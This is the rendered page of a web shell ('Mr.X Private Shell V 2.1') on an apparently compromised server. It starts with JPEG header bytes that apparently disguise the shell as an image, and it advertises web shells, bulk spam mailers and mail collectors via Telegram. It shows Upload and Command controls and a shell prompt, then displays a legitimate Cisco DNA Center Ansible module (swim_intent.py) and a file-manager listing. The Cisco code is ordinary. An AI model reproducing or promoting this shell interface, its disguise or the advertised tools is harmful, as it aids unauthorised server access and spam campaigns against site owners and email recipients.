����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

deexcl@216.73.217.71: ~ $
# -*- coding: utf-8 -*-

# Copyright (c) 2022, Cisco Systems
# GNU General Public License v3.0+ (see LICENSE or https://www.gnu.org/licenses/gpl-3.0.txt)

from __future__ import absolute_import, division, print_function

__metaclass__ = type
__author__ = ("Madhan Sankaranarayanan, Rishita Chowdhary")

DOCUMENTATION = r"""
---
module: swim_intent
short_description: Intent module for SWIM related functions
description:
- Manage operation related to image importation, distribution, activation and tagging image as golden
- API to fetch a software image from remote file system using URL for HTTP/FTP and upload it to DNA Center.
  Supported image files extensions are bin, img, tar, smu, pie, aes, iso, ova, tar_gz and qcow2.
- API to fetch a software image from local file system and upload it to DNA Center
  Supported image files extensions are bin, img, tar, smu, pie, aes, iso, ova, tar_gz and qcow2.
- API to tag/untag image as golen for a given family of devices
- API to distribute a software image on a given device. Software image must be imported successfully into
  DNA Center before it can be distributed.
- API to activate a software image on a given device. Software image must be present in the device flash.
version_added: '6.6.0'
extends_documentation_fragment:
  - cisco.dnac.intent_params
author: Madhan Sankaranarayanan (@madhansansel)
        Rishita Chowdhary (@rishitachowdhary)
options:
  config:
    description: List of details of SWIM image being managed
    type: list
    elements: dict
    required: True
    suboptions:
      importImageDetails:
        description: Details of image being imported
        type: dict
        suboptions:
          type:
            description: The source of import, supports url import or local import.
            type: str
          localImageDetails:
            description: Details of the local path of the image to be imported.
            type: dict
            suboptions:
              filePath:
                description: File absolute path.
                type: str
              isThirdParty:
                description: IsThirdParty query parameter. Third party Image check.
                type: bool
              thirdPartyApplicationType:
                description: ThirdPartyApplicationType query parameter. Third Party Application Type.
                type: str
              thirdPartyImageFamily:
                description: ThirdPartyImageFamily query parameter. Third Party image family.
                type: str
              thirdPartyVendor:
                description: ThirdPartyVendor query parameter. Third Party Vendor.
                type: str
          urlDetails:
            description: URL details for SWIM import
            type: dict
            suboptions:
              payload:
                description: Swim Import Via Url's payload.
                type: list
                elements: dict
                suboptions:
                  applicationType:
                    description: Swim Import Via Url's applicationType.
                    type: str
                  imageFamily:
                    description: Swim Import Via Url's imageFamily.
                    type: str
                  sourceURL:
                    description: Swim Import Via Url's sourceURL.
                    type: str
                  thirdParty:
                    description: ThirdParty flag.
                    type: bool
                  vendor:
                    description: Swim Import Via Url's vendor.
                    type: str
              scheduleAt:
                description: ScheduleAt query parameter. Epoch Time (The number of milli-seconds since
                  January 1 1970 UTC) at which the distribution should be scheduled (Optional).
                type: str
              scheduleDesc:
                description: ScheduleDesc query parameter. Custom Description (Optional).
                type: str
              scheduleOrigin:
                description: ScheduleOrigin query parameter. Originator of this call (Optional).
                type: str
      taggingDetails:
        description: Details for tagging or untagging an image as golden
        type: dict
        suboptions:
          imageName:
            description: SWIM image name which will be tagged or untagged as golden.
            type: str
          deviceRole:
            description: Device Role. Permissible Values ALL, UNKNOWN, ACCESS, BORDER ROUTER,
              DISTRIBUTION and CORE.
            type: str
          deviceFamilyName:
            description: Device family name
            type: str
          siteName:
            description: Site name for which SWIM image will be tagged/untagged as golden.
              If not provided, SWIM image will be mapped to global site.
            type: str
          tagging:
            description: Booelan value to tag/untag SWIM image as golden
              If True then the given image will be tagged as golden.
              If False then the given image will be un-tagged as golden.
            type: bool
      imageDistributionDetails:
        description: Details for SWIM image distribution. Device on which the image needs to distributed
          can be speciifed using any of the following parameters - deviceSerialNumber,
          deviceIPAddress, deviceHostname or deviceMacAddress.
        type: dict
        suboptions:
          imageName:
            description: SWIM image's name
            type: str
          deviceSerialNumber:
            description: Device serial number where the image needs to be distributed
            type: str
          deviceIPAddress:
            description: Device IP address where the image needs to be distributed
            type: str
          deviceHostname:
            description: Device hostname where the image needs to be distributed
            type: str
          deviceMacAddress:
            description: Device MAC address where the image needs to be distributed
            type: str
      imageActivationDetails:
        description: Details for SWIM image activation. Device on which the image needs to activated
          can be speciifed using any of the following parameters - deviceSerialNumber,
          deviceIPAddress, deviceHostname or deviceMacAddress.
        type: dict
        suboptions:
          activateLowerImageVersion:
            description: ActivateLowerImageVersion flag.
            type: bool
          deviceUpgradeMode:
            description: Swim Trigger Activation's deviceUpgradeMode.
            type: str
          distributeIfNeeded:
            description: DistributeIfNeeded flag.
            type: bool
          imageName:
            description: SWIM image's name
            type: str
          deviceSerialNumber:
            description: Device serial number where the image needs to be activated
            type: str
          deviceIPAddress:
            description: Device IP address where the image needs to be activated
            type: str
          deviceHostname:
            description: Device hostname where the image needs to be activated
            type: str
          deviceMacAddress:
            description: Device MAC address where the image needs to be activated
            type: str
          scheduleValidate:
            description: ScheduleValidate query parameter. ScheduleValidate, validates data
              before schedule (Optional).
            type: bool
requirements:
- dnacentersdk == 2.4.5
- python >= 3.5
notes:
  - SDK Method used are
    software_image_management_swim.SoftwareImageManagementSwim.import_software_image_via_url,
    software_image_management_swim.SoftwareImageManagementSwim.tag_as_golden_image,
    software_image_management_swim.SoftwareImageManagementSwim.trigger_software_image_distribution,
    software_image_management_swim.SoftwareImageManagementSwim.trigger_software_image_activation,

  - Paths used are
    post /dna/intent/api/v1/image/importation/source/url,
    post /dna/intent/api/v1/image/importation/golden,
    post /dna/intent/api/v1/image/distribution,
    post /dna/intent/api/v1/image/activation/device,

"""

EXAMPLES = r"""
- name: Import an image from a URL, tag it as golden and load it on device
  cisco.dnac.swim_intent:
    dnac_host: "{{dnac_host}}"
    dnac_username: "{{dnac_username}}"
    dnac_password: "{{dnac_password}}"
    dnac_verify: "{{dnac_verify}}"
    dnac_port: "{{dnac_port}}"
    dnac_version: "{{dnac_version}}"
    dnac_debug: "{{dnac_debug}}"
    dnac_log: True
    config:
    - importImageDetails:
        type: string
        urlDetails:
          payload:
          - sourceURL: string
            isThirdParty: bool
            imageFamily: string
            vendor: string
            applicationType: string
          scheduleAt: string
          scheduleDesc: string
          scheduleOrigin: string
      taggingDetails:
        imageName: string
        deviceRole: string
        deviceFamilyName: string
        siteName: string
        tagging: bool
      imageDistributionDetails:
        imageName: string
        deviceSerialNumber: string
      imageActivationDetails:
        scheduleValidate: bool
        activateLowerImageVersion: bool
        distributeIfNeeded: bool
        deviceSerialNumber: string
        imageName: string
"""

RETURN = r"""
#Case: SWIM image is successfully imported, tagged as golden, distributed and activated on a device
response:
  description: A dictionary with activation details as returned by the DNAC Python SDK
  returned: always
  type: dict
  sample: >
    {
      "response": {
                        "additionalStatusURL": String,
                        "data": String,
                        "endTime": 0,
                        "id": String,
                        "instanceTenantId": String,
                        "isError": bool,
                        "lastUpdate": 0,
                        "progress": String,
                        "rootId": String,
                        "serviceType": String,
                        "startTime": 0,
                        "version": 0
                  },
      "msg": String
    }

"""

import copy
from ansible_collections.cisco.dnac.plugins.module_utils.dnac import (
    DNACSDK,
    validate_list_of_dicts,
    log,
    get_dict_result,
)
from ansible.module_utils.basic import AnsibleModule


class DnacSwims:

    def __init__(self, module):
        self.module = module
        self.params = module.params
        self.config = copy.deepcopy(module.params.get("config"))
        self.have = {}
        self.want_create = {}
        self.diff_create = []
        self.validated = []
        dnac_params = self.get_dnac_params(self.params)
        log(str(dnac_params))
        self.dnac = DNACSDK(params=dnac_params)
        self.log = dnac_params.get("dnac_log")

        self.result = dict(changed=False, diff=[], response=[], warnings=[])

    def validate_input(self):
        temp_spec = dict(
            importImageDetails=dict(type='dict'),
            taggingDetails=dict(type='dict'),
            imageDistributionDetails=dict(type='dict'),
            imageActivationDetails=dict(type='dict'),
        )
        if self.config:
            msg = None
            # Validate site params
            valid_temp, invalid_params = validate_list_of_dicts(
                self.config, temp_spec
            )
            if invalid_params:
                msg = "Invalid parameters in playbook: {0}".format(
                    "\n".join(invalid_params)
                )
                self.module.fail_json(msg=msg)

            self.validated = valid_temp
            if self.log:
                log(str(valid_temp))
                log(str(self.validated))

    def get_dnac_params(self, params):
        dnac_params = dict(
            dnac_host=params.get("dnac_host"),
            dnac_port=params.get("dnac_port"),
            dnac_username=params.get("dnac_username"),
            dnac_password=params.get("dnac_password"),
            dnac_verify=params.get("dnac_verify"),
            dnac_debug=params.get("dnac_debug"),
            dnac_log=params.get("dnac_log")
        )
        return dnac_params

    def get_task_details(self, id):
        result = None
        response = self.dnac._exec(
            family="task",
            function='get_task_by_id',
            params={"task_id": id},
        )
        if self.log:
            log(str(response))

        if isinstance(response, dict):
            result = response.get("response")

        return result

    def site_exists(self):
        site_exists = False
        site_id = None
        response = None
        try:
            response = self.dnac._exec(
                family="sites",
                function='get_site',
                params={"name": self.want.get("site_name")},
            )
        except Exception as e:
            self.module.fail_json(msg="Site not found")

        if response:
            if self.log:
                log(str(response))

            site = response.get("response")
            site_id = site[0].get("id")
            site_exists = True

        return (site_exists, site_id)

    def get_image_id(self, name):
        # check if given image exists, if exists store image_id
        image_response = self.dnac._exec(
            family="software_image_management_swim",
            function='get_software_image_details',
            params={"image_name": name},
        )

        if self.log:
            log(str(image_response))

        image_list = image_response.get("response")
        if (len(image_list) == 1):
            image_id = image_list[0].get("imageUuid")
            if self.log:
                log("Image Id: " + str(image_id))
        else:
            self.module.fail_json(msg="Image not found", response=image_response)

        return image_id

    def get_device_id(self, params):
        response = self.dnac._exec(
            family="devices",
            function='get_device_list',
            params=params,
        )
        if self.log:
            log(str(response))

        device_list = response.get("response")
        if (len(device_list) == 1):
            device_id = device_list[0].get("id")
            if self.log:
                log("Device Id: " + str(device_id))
        else:
            self.module.fail_json(msg="Device not found", response=response)

        return device_id

    def get_device_family_identifier(self, family_name):
        have = {}
        response = self.dnac._exec(
            family="software_image_management_swim",
            function='get_device_family_identifiers',
        )
        if self.log:
            log(str(response))
        device_family_db = response.get("response")
        if device_family_db:
            device_family_details = get_dict_result(device_family_db, 'deviceFamily', family_name)
            if device_family_details:
                device_family_identifier = device_family_details.get("deviceFamilyIdentifier")
                have["device_family_identifier"] = device_family_identifier
                if self.log:
                    log("Family device indentifier:" + str(device_family_identifier))
            else:
                self.module.fail_json(msg="Family Device Name not found", response=[])
            self.have.update(have)

    def get_have(self):
        if self.want.get("tagging_details"):
            have = {}
            tagging_details = self.want.get("tagging_details")
            if tagging_details.get("imageName"):
                image_id = self.get_image_id(tagging_details.get("imageName"))
                have["tagging_image_id"] = image_id

            elif self.have.get("imported_image_id"):
                have["tagging_image_id"] = self.have.get("imported_image_id")

            else:
                self.module.fail_json(msg="Image details for tagging not provided", response=[])

            # check if given site exists, store siteid
            # if not then use global site
            site_name = tagging_details.get("siteName")
            if site_name:
                site_exists = False
                (site_exists, site_id) = self.site_exists()
                if site_exists:
                    have["site_id"] = site_id
                    if self.log:
                        log("Site Exists: " + str(site_exists) + "\n Site_id:" + str(site_id))
            else:
                # For global site, use -1 as siteId
                have["site_id"] = "-1"
                if self.log:
                    log("Site Name not given by user. Using global site.")

            self.have.update(have)
            # check if given device family name exists, store indentifier value
            family_name = tagging_details.get("deviceFamilyName")
            self.get_device_family_identifier(family_name)

        if self.want.get("distribution_details"):
            have = {}
            distribution_details = self.want.get("distribution_details")
            # check if image for distributon is available
            if distribution_details.get("imageName"):
                image_id = self.get_image_id(distribution_details.get("imageName"))
                have["distribution_image_id"] = image_id

            elif self.have.get("imported_image_id"):
                have["distribution_image_id"] = self.have.get("imported_image_id")

            else:
                self.module.fail_json(msg="Image details for distribution not provided", response=[])

            device_params = dict(
                hostname=distribution_details.get("deviceHostname"),
                serial_number=distribution_details.get("deviceSerialNumber"),
                management_ip_address=distribution_details.get("deviceIpAddress"),
                mac_address=distribution_details.get("deviceMacAddress"),
            )
            device_id = self.get_device_id(device_params)
            have["distribution_device_id"] = device_id
            self.have.update(have)

        if self.want.get("activation_details"):
            have = {}
            activation_details = self.want.get("activation_details")
            # check if image for activation is available
            if activation_details.get("imageName"):
                image_id = self.get_image_id(activation_details.get("imageName"))
                have["activation_image_id"] = image_id

            elif self.have.get("imported_image_id"):
                have["activation_image_id"] = self.have.get("imported_image_id")

            else:
                self.module.fail_json(msg="Image details for activation not provided", response=[])

            device_params = dict(
                hostname=activation_details.get("deviceHostname"),
                serial_number=activation_details.get("deviceSerialNumber"),
                management_ip_address=activation_details.get("deviceIpAddress"),
                mac_address=activation_details.get("deviceMacAddress"),
            )
            device_id = self.get_device_id(device_params)
            have["activation_device_id"] = device_id
            self.have.update(have)

    def get_want(self):
        want = {}
        for image in self.validated:
            if image.get("importImageDetails"):
                want["import_image"] = True
                want["import_type"] = image.get("importImageDetails").get("type").lower()
                if want["import_type"] == "url":
                    want["url_import_details"] = image.get("importImageDetails").get("urlDetails")
                elif want["import_type"] == "local":
                    want["local_import_details"] = image.get("importImageDetails").get("localImageDetails")
                else:
                    self.module.fail_json(msg="Incorrect import type. Supported Values: local or url")

            want["tagging_details"] = image.get("taggingDetails")
            want["distribution_details"] = image.get("imageDistributionDetails")
            want["activation_details"] = image.get("imageActivationDetails")

        self.want = want
        if self.log:
            log(str(self.want))

    def get_diff_import(self):
        if not self.want.get("import_image"):
            return

        if self.want.get("import_type") == "url":
            image_name = self.want.get("url_import_details").get("payload")[0].get("sourceURL")
            url_import_params = dict(
                payload=self.want.get("url_import_details").get("payload"),
                schedule_at=self.want.get("url_import_details").get("scheduleAt"),
                schedule_desc=self.want.get("url_import_details").get("scheduleDesc"),
                schedule_origin=self.want.get("url_import_details").get("scheduleOrigin"),
            )
            response = self.dnac._exec(
                family="software_image_management_swim",
                function='import_software_image_via_url',
                op_modifies=True,
                params=url_import_params,
            )
        else:
            image_name = self.want.get("local_import_details").get("filePath")
            local_import_params = dict(
                is_third_party=self.want.get("local_import_details").get("isThirdParty"),
                third_party_vendor=self.want.get("local_import_details").get("thirdPartyVendor"),
                third_party_image_family=self.want.get("local_import_details").get("thirdPartyImageFamily"),
                third_party_application_type=self.want.get("local_import_details").get("thirdPartyApplicationType"),
                file_path=self.want.get("local_import_details").get("filePath"),
            )
            response = self.dnac._exec(
                family="software_image_management_swim",
                function='import_local_software_image',
                op_modifies=True,
                params=local_import_params,
                file_paths=[('file_path', 'file')],
            )

        if self.log:
            log(str(response))

        task_details = {}
        task_id = response.get("response").get("taskId")
        while (True):
            task_details = self.get_task_details(task_id)
            if task_details and \
                    ("completed successfully" in task_details.get("progress").lower()):
                self.result['changed'] = True
                self.result['msg'] = "Image imported successfully"
                break

            if task_details and task_details.get("isError"):
                if "Image already exists" in task_details.get("failureReason"):
                    self.result['msg'] = "Image already exists."
                    break
                else:
                    self.module.fail_json(msg=task_details.get("failureReason"),
                                          response=task_details)

        self.result['response'] = task_details if task_details else response
        if not (self.want.get("tagging_details") or self.want.get("distribution_details")
                or self.want.get("activation_details")):
            return
        # Fetch image_id for the imported image for further use
        image_name = image_name.split('/')[-1]
        image_id = self.get_image_id(image_name)
        self.have["imported_image_id"] = image_id

    def get_diff_tagging(self):
        tagging_details = self.want.get("tagging_details")
        tag_image_golden = tagging_details.get("tagging")

        if tag_image_golden:
            image_params = dict(
                imageId=self.have.get("tagging_image_id"),
                siteId=self.have.get("site_id"),
                deviceFamilyIdentifier=self.have.get("device_family_identifier"),
                deviceRole=tagging_details.get("deviceRole")
            )
            if self.log:
                log("Image params for tagging image as golden:" + str(image_params))

            response = self.dnac._exec(
                family="software_image_management_swim",
                function='tag_as_golden_image',
                op_modifies=True,
                params=image_params
            )

        else:
            image_params = dict(
                image_id=self.have.get("tagging_image_id"),
                site_id=self.have.get("site_id"),
                device_family_identifier=self.have.get("device_family_identifier"),
                device_role=tagging_details.get("deviceRole")
            )
            if self.log:
                log("Image params for un-tagging image as golden:" + str(image_params))

            response = self.dnac._exec(
                family="software_image_management_swim",
                function='remove_golden_tag_for_image',
                op_modifies=True,
                params=image_params
            )

        if response:
            task_details = {}
            task_id = response.get("response").get("taskId")
            task_details = self.get_task_details(task_id)
            if not task_details.get("isError"):
                self.result['changed'] = True
                self.result['msg'] = task_details.get("progress")

            self.result['response'] = task_details if task_details else response

    def get_diff_distribution(self):
        distribution_details = self.want.get("distribution_details")
        distribution_params = dict(
            payload=[dict(
                deviceUuid=self.have.get("distribution_device_id"),
                imageUuid=self.have.get("distribution_image_id")
            )]
        )
        if self.log:
            log("Distribution Params: " + str(distribution_params))

        response = self.dnac._exec(
            family="software_image_management_swim",
            function='trigger_software_image_distribution',
            op_modifies=True,
            params=distribution_params,
        )
        if response:
            task_details = {}
            task_id = response.get("response").get("taskId")
            while (True):
                task_details = self.get_task_details(task_id)
                if not task_details.get("isError") and \
                        ("completed successfully" in task_details.get("progress")):
                    self.result['changed'] = True
                    self.result['msg'] = "Image Distributed Successfully"
                    break

                if task_details.get("isError"):
                    self.module.fail_json(msg="Image Distribution Failed",
                                          response=task_details)

            self.result['response'] = task_details if task_details else response

    def get_diff_activation(self):
        activation_details = self.want.get("activation_details")
        payload = [dict(
            activateLowerImageVersion=activation_details.get("activateLowerImageVersion"),
            deviceUpgradeMode=activation_details.get("deviceUpgradeMode"),
            distributeIfNeeded=activation_details.get("distributeIfNeeded"),
            deviceUuid=self.have.get("activation_device_id"),
            imageUuidList=[self.have.get("activation_image_id")]
        )]
        activation_params = dict(
            schedule_validate=activation_details.get("scehduleValidate"),
            payload=payload
        )
        if self.log:
            log("Activation Params: " + str(activation_params))

        response = self.dnac._exec(
            family="software_image_management_swim",
            function='trigger_software_image_activation',
            op_modifies=True,
            params=activation_params,
        )
        task_details = {}
        task_id = response.get("response").get("taskId")
        while (True):
            task_details = self.get_task_details(task_id)
            if not task_details.get("isError") and \
                    ("completed successfully" in task_details.get("progress")):
                self.result['changed'] = True
                self.result['msg'] = "Image activated successfully"
                break

            if task_details.get("isError"):
                self.module.fail_json(msg="Image Activation Failed",
                                          response=task_details)

        self.result['response'] = task_details if task_details else response

    def get_diff(self):
        if self.want.get("tagging_details"):
            self.get_diff_tagging()

        if self.want.get("distribution_details"):
            self.get_diff_distribution()

        if self.want.get("activation_details"):
            self.get_diff_activation()


def main():
    """ main entry point for module execution
    """

    element_spec = dict(
        dnac_host=dict(required=True, type='str'),
        dnac_port=dict(type='str', default='443'),
        dnac_username=dict(type='str', default='admin', aliases=["user"]),
        dnac_password=dict(type='str', no_log=True),
        dnac_verify=dict(type='bool', default='True'),
        dnac_version=dict(type="str", default="2.2.3.3"),
        dnac_debug=dict(type='bool', default=False),
        dnac_log=dict(type='bool', default=False),
        config=dict(required=True, type='list', elements='dict'),
        validate_response_schema=dict(type="bool", default=True),
    )

    module = AnsibleModule(argument_spec=element_spec,
                           supports_check_mode=False)

    dnac_swims = DnacSwims(module)
    dnac_swims.validate_input()
    dnac_swims.get_want()
    dnac_swims.get_diff_import()
    dnac_swims.get_have()
    dnac_swims.get_diff()

    module.exit_json(**dnac_swims.result)


if __name__ == '__main__':
    main()

Filemanager

Name Type Size Permission Actions
__pycache__ Folder 0755
__init__.py File 0 B 0644
accesspoint_configuration_details_by_task_id_info.py File 2.81 KB 0644
app_policy_default_info.py File 3.92 KB 0644
app_policy_info.py File 5.15 KB 0644
app_policy_intent_create.py File 9.63 KB 0644
app_policy_queuing_profile.py File 6.34 KB 0644
app_policy_queuing_profile_count_info.py File 1.78 KB 0644
app_policy_queuing_profile_info.py File 4.37 KB 0644
application_sets.py File 2.47 KB 0644
application_sets_count_info.py File 1.66 KB 0644
application_sets_info.py File 1.97 KB 0644
applications.py File 7.28 KB 0644
applications_count_info.py File 1.6 KB 0644
applications_health_info.py File 4.38 KB 0644
applications_info.py File 3.15 KB 0644
assign_device_to_site.py File 1.98 KB 0644
associate_site_to_network_profile.py File 1.8 KB 0644
authentication_import_certificate.py File 2.04 KB 0644
authentication_import_certificate_p12.py File 2.08 KB 0644
authentication_policy_servers_info.py File 3.38 KB 0644
buildings_planned_access_points_info.py File 3.32 KB 0644
business_sda_hostonboarding_ssid_ippool.py File 2.98 KB 0644
business_sda_hostonboarding_ssid_ippool_info.py File 2.06 KB 0644
business_sda_virtual_network_summary_info.py File 2 KB 0644
business_sda_wireless_controller_create.py File 1.83 KB 0644
business_sda_wireless_controller_delete.py File 1.93 KB 0644
cli_credential.py File 3.22 KB 0644
client_detail_info.py File 4.91 KB 0644
client_enrichment_details_info.py File 6.84 KB 0644
client_health_info.py File 2.89 KB 0644
client_proximity_info.py File 2.5 KB 0644
command_runner_run_command.py File 2.25 KB 0644
compliance_check_run.py File 1.81 KB 0644
compliance_device_by_id_info.py File 3.99 KB 0644
compliance_device_details_count_info.py File 2.17 KB 0644
compliance_device_details_info.py File 2.73 KB 0644
compliance_device_info.py File 3.06 KB 0644
compliance_device_status_count_info.py File 1.9 KB 0644
configuration_template.py File 19.43 KB 0644
configuration_template_clone.py File 2.13 KB 0644
configuration_template_create.py File 18.74 KB 0644
configuration_template_deploy.py File 3.54 KB 0644
configuration_template_deploy_status_info.py File 2.56 KB 0644
configuration_template_deploy_v2.py File 3.01 KB 0644
configuration_template_export_project.py File 1.82 KB 0644
configuration_template_export_template.py File 1.83 KB 0644
configuration_template_import_project.py File 2.02 KB 0644
configuration_template_import_template.py File 21.89 KB 0644
configuration_template_info.py File 9.9 KB 0644
configuration_template_project.py File 27.45 KB 0644
configuration_template_project_info.py File 9.43 KB 0644
configuration_template_version_create.py File 1.8 KB 0644
configuration_template_version_info.py File 2.29 KB 0644
credential_to_site_by_siteid_create_v2.py File 2.31 KB 0644
device_configurations_export.py File 1.8 KB 0644
device_credential_create.py File 5.53 KB 0644
device_credential_delete.py File 1.63 KB 0644
device_credential_info.py File 3.83 KB 0644
device_credential_update.py File 5.31 KB 0644
device_details_info.py File 3.32 KB 0644
device_enrichment_details_info.py File 4.18 KB 0644
device_family_identifiers_details_info.py File 1.93 KB 0644
device_health_info.py File 3.8 KB 0644
device_interface_by_ip_info.py File 2.76 KB 0644
device_interface_count_info.py File 1.6 KB 0644
device_interface_info.py File 3.76 KB 0644
device_interface_isis_info.py File 2.59 KB 0644
device_interface_ospf_info.py File 2.59 KB 0644
device_reboot_apreboot.py File 1.71 KB 0644
device_reboot_apreboot_info.py File 1.97 KB 0644
device_replacement.py File 4.64 KB 0644
device_replacement_count_info.py File 1.92 KB 0644
device_replacement_deploy.py File 2 KB 0644
device_replacement_info.py File 4.24 KB 0644
disassociate_site_to_network_profile.py File 1.84 KB 0644
disasterrecovery_system_operationstatus_info.py File 2.22 KB 0644
disasterrecovery_system_status_info.py File 3.18 KB 0644
discovery.py File 10.61 KB 0644
discovery_count_info.py File 1.59 KB 0644
discovery_device_count_info.py File 1.91 KB 0644
discovery_device_info.py File 3.55 KB 0644
discovery_device_range_info.py File 3.88 KB 0644
discovery_info.py File 3.52 KB 0644
discovery_job_info.py File 3.55 KB 0644
discovery_range_delete.py File 1.84 KB 0644
discovery_range_info.py File 3.82 KB 0644
discovery_summary_info.py File 2.77 KB 0644
dna_command_runner_keywords_info.py File 1.74 KB 0644
dnac_packages_info.py File 1.7 KB 0644
dnacaap_management_execution_status_info.py File 2.11 KB 0644
endpoint_analytics_profiling_rules.py File 6.8 KB 0644
endpoint_analytics_profiling_rules_info.py File 4.92 KB 0644
eox_status_device_info.py File 3.39 KB 0644
eox_status_summary_info.py File 1.65 KB 0644
event_api_status_info.py File 1.81 KB 0644
event_artifact_count_info.py File 1.61 KB 0644
event_artifact_info.py File 3.25 KB 0644
event_config_connector_types_info.py File 1.75 KB 0644
event_count_info.py File 1.79 KB 0644
event_email_config.py File 3.71 KB 0644
event_email_config_create.py File 2.75 KB 0644
event_email_config_info.py File 2.12 KB 0644
event_email_config_update.py File 2.75 KB 0644
event_info.py File 2.66 KB 0644
event_series_audit_logs_info.py File 6 KB 0644
event_series_audit_logs_parent_records_info.py File 5.96 KB 0644
event_series_audit_logs_summary_info.py File 4.75 KB 0644
event_series_count_info.py File 2.47 KB 0644
event_series_info.py File 3.67 KB 0644
event_snmp_config_info.py File 2.8 KB 0644
event_subscription.py File 6.16 KB 0644
event_subscription_count_info.py File 1.77 KB 0644
event_subscription_details_email_info.py File 2.75 KB 0644
event_subscription_details_rest_info.py File 2.99 KB 0644
event_subscription_details_syslog_info.py File 2.87 KB 0644
event_subscription_email.py File 6.23 KB 0644
event_subscription_email_info.py File 4.39 KB 0644
event_subscription_info.py File 4 KB 0644
event_subscription_rest.py File 5.48 KB 0644
event_subscription_rest_info.py File 4.84 KB 0644
event_subscription_syslog.py File 5.44 KB 0644
event_subscription_syslog_info.py File 4.48 KB 0644
event_syslog_config.py File 2.83 KB 0644
event_syslog_config_info.py File 2.8 KB 0644
event_webhook_create.py File 2.47 KB 0644
event_webhook_update.py File 2.47 KB 0644
execute_suggested_actions_commands.py File 2.28 KB 0644
file_import.py File 1.51 KB 0644
file_info.py File 2.09 KB 0644
file_namespace_files_info.py File 2.11 KB 0644
file_namespaces_info.py File 1.59 KB 0644
global_credential_delete.py File 1.73 KB 0644
global_credential_info.py File 2.93 KB 0644
global_credential_update.py File 1.84 KB 0644
global_credential_v2.py File 7.1 KB 0644
global_credential_v2_info.py File 3.97 KB 0644
global_pool.py File 3.91 KB 0644
global_pool_info.py File 2.61 KB 0644
golden_image_create.py File 2.08 KB 0644
golden_tag_image_delete.py File 2.34 KB 0644
golden_tag_image_details_info.py File 2.61 KB 0644
http_read_credential.py File 3.4 KB 0644
http_write_credential.py File 3.44 KB 0644
integration_settings_instances_itsm.py File 4.81 KB 0644
integration_settings_instances_itsm_info.py File 2.29 KB 0644
interface_info.py File 3.04 KB 0644
interface_network_device_detail_info.py File 2.9 KB 0644
interface_network_device_info.py File 2.75 KB 0644
interface_network_device_range_info.py File 3.13 KB 0644
interface_operation_create.py File 2.19 KB 0644
interface_update.py File 2.47 KB 0644
issues_enrichment_details_info.py File 2.35 KB 0644
issues_info.py File 3.28 KB 0644
itsm_cmdb_sync_status_info.py File 2.5 KB 0644
itsm_integration_events_failed_info.py File 2.3 KB 0644
itsm_integration_events_retry.py File 1.94 KB 0644
lan_automation_count_info.py File 1.63 KB 0644
lan_automation_create.py File 3.54 KB 0644
lan_automation_delete.py File 1.73 KB 0644
lan_automation_log_by_serial_number_info.py File 2.73 KB 0644
lan_automation_log_info.py File 3.1 KB 0644
lan_automation_status_info.py File 3.75 KB 0644
license_device_count_info.py File 2.28 KB 0644
license_device_deregistration.py File 1.69 KB 0644
license_device_license_details_info.py File 3.22 KB 0644
license_device_license_summary_info.py File 4.13 KB 0644
license_device_registration.py File 1.84 KB 0644
license_smart_account_details_info.py File 1.77 KB 0644
license_term_details_info.py File 2.45 KB 0644
license_usage_details_info.py File 2.99 KB 0644
license_virtual_account_change.py File 2.04 KB 0644
license_virtual_account_details_info.py File 1.99 KB 0644
netconf_credential.py File 3.11 KB 0644
network_create.py File 6.18 KB 0644
network_device.py File 6.75 KB 0644
network_device_by_ip_info.py File 3.03 KB 0644
network_device_by_serial_number_info.py File 3.16 KB 0644
network_device_chassis_details_info.py File 2.33 KB 0644
network_device_config_count_info.py File 1.62 KB 0644
network_device_config_info.py File 2.52 KB 0644
network_device_count_info.py File 2.56 KB 0644
network_device_custom_prompt.py File 1.88 KB 0644
network_device_custom_prompt_info.py File 1.87 KB 0644
network_device_equipment_info.py File 2.35 KB 0644
network_device_export.py File 2.04 KB 0644
network_device_functional_capability_info.py File 3.42 KB 0644
network_device_global_polling_interval_info.py File 1.73 KB 0644
network_device_info.py File 8 KB 0644
network_device_interface_neighbor_info.py File 2.11 KB 0644
network_device_interface_poe_info.py File 2.4 KB 0644
network_device_inventory_insight_link_mismatch_info.py File 3.67 KB 0644
network_device_lexicographically_sorted_info.py File 4.1 KB 0644
network_device_linecard_details_info.py File 1.98 KB 0644
network_device_meraki_organization_info.py File 1.81 KB 0644
network_device_module_count_info.py File 2.21 KB 0644
network_device_module_info.py File 3.73 KB 0644
network_device_poe_info.py File 1.76 KB 0644
network_device_polling_interval_info.py File 1.75 KB 0644
network_device_range_info.py File 3.42 KB 0644
network_device_register_for_wsa_info.py File 2.27 KB 0644
network_device_stack_details_info.py File 3.65 KB 0644
network_device_summary_info.py File 1.81 KB 0644
network_device_supervisor_card_details_info.py File 2.04 KB 0644
network_device_sync.py File 1.93 KB 0644
network_device_update_role.py File 1.83 KB 0644
network_device_user_defined_field.py File 3.38 KB 0644
network_device_user_defined_field_info.py File 2.17 KB 0644
network_device_vlan_info.py File 2.07 KB 0644
network_device_wireless_lan_info.py File 2.22 KB 0644
network_device_with_snmp_v3_des_info.py File 2.64 KB 0644
network_info.py File 2.13 KB 0644
network_update.py File 6.08 KB 0644
network_v2.py File 7.63 KB 0644
network_v2_info.py File 2.02 KB 0644
nfv_profile.py File 8.75 KB 0644
nfv_profile_info.py File 3.76 KB 0644
nfv_provision.py File 16.58 KB 0644
nfv_provision_detail_info.py File 2.42 KB 0644
nfv_provision_details.py File 1.73 KB 0644
path_trace.py File 3.24 KB 0644
path_trace_info.py File 35.31 KB 0644
planned_access_points_info.py File 3.24 KB 0644
platform_nodes_configuration_summary_info.py File 3.32 KB 0644
platform_release_summary_info.py File 2.1 KB 0644
pnp_device.py File 46 KB 0644
pnp_device_authorize.py File 1.69 KB 0644
pnp_device_claim.py File 3.61 KB 0644
